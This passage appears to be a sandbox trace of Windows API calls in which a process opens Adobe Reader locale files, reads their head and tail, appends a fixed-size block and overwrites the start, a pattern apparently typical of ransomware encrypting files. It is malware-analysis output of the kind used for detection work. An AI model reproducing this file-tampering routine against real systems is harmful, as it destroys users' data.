10.0\\reader\\locale\\es_es\\ebook.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0076.419] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0076.419] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1c00 [0076.419] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0076.419] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.420] ReleaseMutex (hMutex=0x168) returned 1 [0076.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.ESP", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0076.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.ESP", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.ESP", lpUsedDefaultChar=0x0) returned 9 [0076.420] ReadFile (in: hFile=0x1dc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2e9f2bc*=0x1c00, lpOverlapped=0x0) returned 1 [0076.422] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0076.422] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x2188, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2e9f2d0*=0x2188, lpOverlapped=0x0) returned 1 [0076.423] CloseHandle (hObject=0x1dc) returned 1 [0076.423] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\ReadOutLoud.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\readoutloud.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0076.424] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0076.424] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2a00 [0076.424] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0076.424] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.425] ReleaseMutex (hMutex=0x168) returned 1 [0076.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.ESP", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0076.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.ESP", cchWideChar=15, lpMultiByteStr=0x1f7344c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.ESP", lpUsedDefaultChar=0x0) returned 15 [0076.425] ReadFile (in: hFile=0x1dc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.426] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1a00 [0076.426] ReadFile (in: hFile=0x1dc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.427] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1a00 [0076.428] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.428] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0076.428] WriteFile (in: hFile=0x1dc, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.428] CloseHandle (hObject=0x1dc) returned 1 [0076.429] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\updater.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\updater.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0076.429] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0076.429] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2a00 [0076.429] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0076.430] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.430] ReleaseMutex (hMutex=0x168) returned 1 [0076.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.ESP", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.ESP", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.ESP", lpUsedDefaultChar=0x0) returned 11 [0076.430] ReadFile (in: hFile=0x1dc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.431] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1a00 [0076.432] ReadFile (in: hFile=0x1dc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.432] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1a00 [0076.433] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.433] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0076.433] WriteFile (in: hFile=0x1dc, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.433] CloseHandle (hObject=0x1dc) returned 1 [0076.433] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\DigSig.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\digsig.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0076.434] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0076.434] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1e600 [0076.434] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0076.434] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.435] ReleaseMutex (hMutex=0x168) returned 1 [0076.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.EUQ", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0076.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.EUQ", cchWideChar=10, lpMultiByteStr=0x1f7344c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.EUQ", lpUsedDefaultChar=0x0) returned 10 [0076.435] ReadFile (in: hFile=0x1dc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0076.437] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1d600 [0076.437] ReadFile (in: hFile=0x1dc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.438] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1d600 [0076.438] WriteFile (in: hFile=0x1dc, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.438] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0076.439] WriteFile (in: hFile=0x1dc, lpBuffer=0x2864c58*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864c58*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.439] CloseHandle (hObject=0x1dc) returned 1 [0076.439] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\PPKLite.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\ppklite.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0076.440] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0076.440] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x81400 [0076.440] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0076.440] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.440] ReleaseMutex (hMutex=0x168) returned 1 [0076.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLite.EUQ", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLite.EUQ", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLite.EUQ", lpUsedDefaultChar=0x0) returned 11 [0076.441] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0076.444] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.445] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x80400 [0076.445] ReadFile (in: hFile=0x1dc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.450] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x80400 [0076.451] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.451] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0076.451] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0076.451] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.452] CloseHandle (hObject=0x1dc) returned 1 [0076.452] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0076.452] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0076.453] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe7 [0076.453] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0076.453] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.453] ReleaseMutex (hMutex=0x168) returned 1 [0076.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0076.454] ReadFile (in: hFile=0x1dc, lpBuffer=0x26bedf8, nNumberOfBytesToRead=0xe7, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26bedf8*, lpNumberOfBytesRead=0x2e9f2bc*=0xe7, lpOverlapped=0x0) returned 1 [0076.455] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0076.455] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x66f, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2e9f2d0*=0x66f, lpOverlapped=0x0) returned 1 [0076.455] CloseHandle (hObject=0x1dc) returned 1 [0076.456] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\BRdlang32.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\brdlang32.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0076.456] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0076.456] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3400 [0076.456] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0076.456] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.457] ReleaseMutex (hMutex=0x168) returned 1 [0076.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.SUO", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.SUO", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.SUO", lpUsedDefaultChar=0x0) returned 13 [0076.457] ReadFile (in: hFile=0x1dc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.459] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2400 [0076.459] ReadFile (in: hFile=0x1dc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.464] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2400 [0076.465] WriteFile (in: hFile=0x1dc, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.465] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0076.465] WriteFile (in: hFile=0x1dc, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.465] CloseHandle (hObject=0x1dc) returned 1 [0076.465] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Multimedia.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\multimedia.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0076.466] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0076.466] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x12c00 [0076.466] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0076.466] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.466] ReleaseMutex (hMutex=0x168) returned 1 [0076.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.SUO", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0076.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.SUO", cchWideChar=14, lpMultiByteStr=0x1f7344c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.SUO", lpUsedDefaultChar=0x0) returned 14 [0076.466] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0076.786] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x11c00 [0076.786] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.167] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x11c00 [0077.167] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.168] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0077.168] WriteFile (in: hFile=0x1dc, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0077.168] CloseHandle (hObject=0x1dc) returned 1 [0077.169] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\SendMail.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 